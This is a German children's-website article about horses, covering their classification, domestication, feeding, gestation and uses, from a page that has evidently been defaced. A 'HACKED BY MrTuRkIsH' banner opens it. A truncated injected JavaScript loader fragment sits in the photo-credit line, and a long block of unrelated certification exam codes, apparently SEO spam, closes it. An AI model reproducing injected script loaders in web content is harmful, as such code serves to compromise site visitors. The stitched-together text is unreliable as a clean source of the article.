HACKED BY
MrTuRkIsH



MrTuRkIsH

Pferde « Florians Galaxis – Kinderseite und Kinderspiele

Pferde

Die Gattung der Pferde

Pferde werden aufgrund ihrer Hufe, die aus nur einem Zeh bestehen, zu der Gattung der Unpaarhufern gezählt. Unpaarhufer zeichnen sich dadurch aus, dass sie eine ungerade Anzahl an Zehen aufweisen. Zu den Unpaarhufern zählen neben den Pferden auch noch Tapire und Nashörner. Dass diese drei doch recht unterschiedlichen Tiere miteinander verwandt sind, das erkannte man erst im 19. Jahrhundert.

Wie viele Pferdearten es gibt, darüber streiten sich Wissenschaftler bis zum heutigen Tage. Im Allgemeinen geht man jedoch davon aus, dass es sieben Arten gibt. Zu diesen Arten zählen die Afrikanischen Esel, die Asiatischen Esel und die Kiangs, die Bergzebras, die Grevyzebras und die Steppenzebras  und die Wildpferde.

Wenn man heute von Pferden spricht, so mein man meistens die sogenannten Hauspferde. Hauspferde sind Wildpferde, die über mehrere Generationen hinweg so gezüchtet wurden, dass sie sich dem Leben der Menschen anpassen konnten. Dieser Prozess begann vermutlich bereits im Jahre 3000 vor Christi Geburt in Zentralasien. Die Menschen erkannten damals, dass sie sich die Kraft und die Ausdauer der Tiere zu Nutze machen konnten. Weite Strecken, für die man vielleicht mehrere Tage benötigt hätte, ginge man zu Fuß, konnten erheblich schneller zurückgelegt werden. Schwere Arbeiten, wie etwa das Tragen oder Transportieren von gefällten Bäumen oder das Arbeiten auf einem Feld, konnten durch die tatkräftige Unterstützung von Pferden erleichtert werden. Und vielleicht weißt du schon, dass Pferde auch in zahlreichen Kriegen eine entscheidende Rolle gespielt haben. Pferde dienten den Menschen nicht nur zu Lebzeiten. Nach ihrem Ableben diente ihr Fleisch als Nahrungsmittel. Auch heute wird noch Pferdefleisch verzehrt, diese Pferde werden jedoch zum Verzehr gezüchtet.

Pferde gibt es überall auf der Welt. Sie fressen ausschließlich Pflanzen. Dazu zählen nicht nur die verschiedensten Gräser, auch Baumrinde und Blätter stehen auf ihrem Speiseplan. Die Fütterung von Pferden ist mitunter recht kompliziert, da die Tiere sehr anspruchsvoll in der Wahl ihrer Speisen sind. Grasschnitt und Heu reichen nicht aus, auch Stroh und Hafer sollten gefüttert werden. Werden Pferde falsch gefüttert oder erfolgt eine zu rasche Umstellung des Futters, so kann es zu einer schmerzhaften Kolik kommen.

Die Schwangerschaft eines Hauspferdes dauert in der Regel zwischen 320 und 360 Tagen. Stuten bringen in der Regel lediglich ein Junges zur Welt, dieses ist jedoch bereits voll entwickelt und kann schon wenige Stunden nach der Geburt stehen und laufen.

Innerhalb der Hauspferde gibt es unterschiedliche Pferderassen, die nach Größe unterschieden werden. Es gibt Ponys, Kleinpferde und Großpferde. Innerhalb dieser Gruppen können Statur und Färbung sehr unterschiedlich sein.

Das Glück dieser Erde liegt auf dem Rücken der Pferde

Pferd

Heute werden Pferde in europäischen Breitengraden kaum noch zur Erleichterung der Arbeit auf dem Feld oder in der Forstwirtschaft eingesetzt. Einige Pferde gehen den alten Berufen jedoch auch in Deutschland noch nach und einige neue sind hinzugekommen. So werden Pferde zum Beispiel bei der Polizei eingesetzt. In großen Städten mit viel Verkehr ist die Polizei auf Fortbewegungsmittel angewiesen, die unabhängig vom Straßenverkehr sind. Zu Pferd können sie Unfallorte schnell erreichen, auch wenn sich auf den Straßen ein langer Stau gebildet hat. In vielen anderen Ländern sind Pferde auch in der heutigen Zeit noch in erster Linie Nutztiere.

Die meisten Pferde in Deutschland sind jedoch eher zu den Haustieren zu zählen. Sie dienen meist als Reittiere oder werden als Zugtiere vor eine Kutsche gespannt. Es gibt viele Freizeitbeschäftigungen mit Pferden. Die beliebteste Freizeitbeschäftigung zu Pferd ist wohl der Ausritt. Danach folgt jedoch gleich der Pferdesport. Beliebt ist das Dressurreiten und auch das Westernreiten. Auch das Springreiten zählt in Deutschland zu den beliebten Pferdesportarten. In Deutschland nicht so weit verbreitet ist hingegen das Pferderennen oder auch der Polosport. Beides ist jedoch in England zum Beispiel sehr beliebt.

Fotos: ©iStockphoto.com/Abramova_Kseniya, Somogyvarivar d=document;var s=d.createElement(’script‘);


Dez 10, 2012 | Kategorie: Kinderspiele | Kommentare: Keine | Tags: , ,

Dies und Das:



SSCP   CAS-002   9L0-066   350-050   642-999   220-801   74-678   642-732   400-051   ICGB   c2010-652   70-413   101-400   220-902   350-080   210-260   70-246   1Z0-144   3002   AWS-SYSOPS   70-347   PEGACPBA71V1   220-901   70-534   LX0-104   070-461   HP0-S42   1Z0-061   000-105   70-486   70-177   N10-006   500-260   640-692   70-980   CISM   VCP550   70-532   200-101   000-080   PR000041   2V0-621   70-411   352-001   70-480   70-461   ICBB   000-089   70-410   350-029   1Z0-060   2V0-620   210-065   70-463   70-483   CRISC   MB6-703   1z0-808   220-802   ITILFND   1Z0-804   LX0-103   MB2-704   210-060   101   200-310   640-911   200-120   EX300   300-209   1Z0-803   350-001   400-201   9L0-012   70-488   JN0-102   640-916   70-270   100-101   MB5-705   JK0-022   350-060   300-320   1z0-434   350-018   400-101   350-030   000-106   ADM-201   300-135   300-208   EX200   PMP   NSE4   1Z0-051   c2010-657   C_TFIN52_66   300-115   70-417   9A0-385   70-243   300-075   70-487   NS0-157   MB2-707   70-533   CAP   OG0-093   M70-101   300-070   102-400   JN0-360   SY0-401   000-017   300-206   CCA-500   70-412   2V0-621D   70-178   810-403   70-462   OG0-091   1V0-601   200-355   000-104   700-501   70-346   CISSP   300-101   1Y0-201   200-125  , 200-125  , 100-105  , 100-105  , 70-347   2V0-621   300-101   220-802   210-260   JN0-360   NS0-157   70-487   70-532   1Z0-060   300-070   210-060   70-532   1Z0-060  , 220-802  , 1Y0-201   1Z0-061   352-001   NSE4  , 1Z0-803  , 640-692   MB2-707   102-400   352-001   OG0-093  , 70-270  , 70-980   MB5-705   N10-006   101-400   70-270   CAP   CAP   220-802   000-105   70-486   300-070   70-270  , 1Y0-201   500-260  , 2V0-620   400-101   101  , AWS-SYSOPS  , c2010-657   N10-006   300-208   642-732   SY0-401   100-105  , 1Z0-061   642-732   000-104  , 9L0-066  , 70-462   300-115  



bottom